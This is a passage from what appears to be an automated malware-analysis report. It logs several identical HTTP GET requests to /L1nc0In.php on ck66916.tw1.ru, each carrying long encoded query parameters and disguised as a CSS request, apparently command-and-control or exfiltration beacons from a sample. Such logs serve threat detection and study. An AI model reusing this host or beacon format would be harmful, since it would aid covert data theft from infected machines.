lMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
